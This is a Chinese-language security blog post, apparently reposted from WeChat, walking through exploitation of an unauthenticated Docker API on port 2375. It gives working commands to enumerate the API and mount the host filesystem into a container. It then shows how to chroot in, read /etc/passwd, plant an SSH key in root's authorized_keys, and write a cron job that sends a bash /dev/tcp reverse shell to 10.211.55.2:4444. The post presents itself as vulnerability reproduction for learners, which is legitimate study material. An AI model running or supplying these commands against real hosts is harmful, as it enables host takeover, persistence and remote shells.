Docker API未授权命令执行
2023-5-16 09:4:0 Author: 谢公子学安全(查看原文) 阅读量:20 收藏

Docker Swarm是Docker的集群管理工具,它将Docker主机池转变为单个虚拟Docker主机,能够方便的进行docker集群的管理和扩展。Docker Swarm使用标准的Docker API通过2375端口来管理每个Docker节点,Docker API是一个取代远程命令行界面(RCLI)的REST API。当Docker节点的2375端口直接暴露并未做权限检查时,存在未授权访问漏洞,攻击者可以利用Docker API执行任何操作,包括执行Docker命令,创建、删除Docker以及获得宿主机权限等。

漏洞复现

访问目标的2375端口如下接口,若有信息,则存在Docker API未授权访问
http://x.x.x.x:2375/versionhttp://x.x.x.x:2375/imageshttp://x.x.x.x:2375/info

docker命令远程管理

可以使用docker命令本地远程管理docker,命令和在docker服务器管理一样。以下只列出部分命令。
docker -H tcp://10.211.55.18:2375 images -adocker -H tcp://10.211.55.18:2375 psdocker -H tcp://10.211.55.18:2375 exec -it e7d97caf249d /bin/bash

获取宿主机权限

但是以上方式都只是控制docker中的容器,我们如何控制docker的宿主机呢?
我们可以执行如下命令启动一个未开启的容器,然后将宿主机的磁盘挂载到容器中。
docker -H tcp://10.211.55.18:2375 run -it -v /:/opt b76f96a98a27 /bin/bash
如图可以看到已经可以管理宿主机的文件系统了。

chroot

使用chroot命令切换到挂载的目录,在使用 chroot 之后,系统的目录结构将以指定的位置作为/位置。在经过 chroot 命令之后,系统读取到的目录和文件将不在是旧系统根下的而是新根下(即被指定的新的位置)的目录结构和文件。
chroot /opt bash#然后就可以执行如下一些命令,但是查看的ip和反弹shell等一些命令,还是容器内的historycat /etc/passwd

写入SSH公钥

执行如下命令将本地的authorized_keys文件上传到/opt/root/.ssh下。
docker -H tcp://10.211.55.18:2375 cp /Users/xie/Desktop/authorized_keys 4dcf21117fb2:/opt/root/.ssh
可以看到公钥文件已经写入。但是通过这种方式上传的authorized_keys文件权限不对可以看到其属主和属组不对。
这时可以执行如下命令修改authorized_keys文件的属主和属组为root,即可正常ssh免密登录。
chown root.root authorized_keys
或者可以直接通过echo命令写入公钥文件,这样就不会有权限问题。

计划任务反弹shell

如果目标宿主机的22端口没开的话,还可以通过定时任务来反弹shell到内网的机器。
执行如下命令,将反弹shell的命令写入/var/spool/cron/root文件中。
#切换到挂载的目录cd /opt/var/spool/cron#写入反弹shell的命令echo "*/1 * * * * /bin/bash -i>&/dev/tcp/10.211.55.2/4444 0>&1" > root
然后就可以收到shell了。

END

非常感谢您读到现在,由于作者的水平有限,编写时间仓促,文章中难免会出现一些错误或者描述不准确的地方,恳请各位师傅们批评指正。  如果你想一起学习内网渗透、域渗透、云安全、红队攻防的话,可以加入下面的知识星球一起学习交流。

文章来源: http://mp.weixin.qq.com/s?__biz=MzI2NDQyNzg1OA==&mid=2247492668&idx=1&sn=00cf8d6ea06c9a60d044b2167870924b&chksm=eaae6401ddd9ed17392f6e847dab91f7c7485a7c354d5d48798e53e233070df9e5aba0450845#rd
如有侵权请联系:admin#unsafe.sh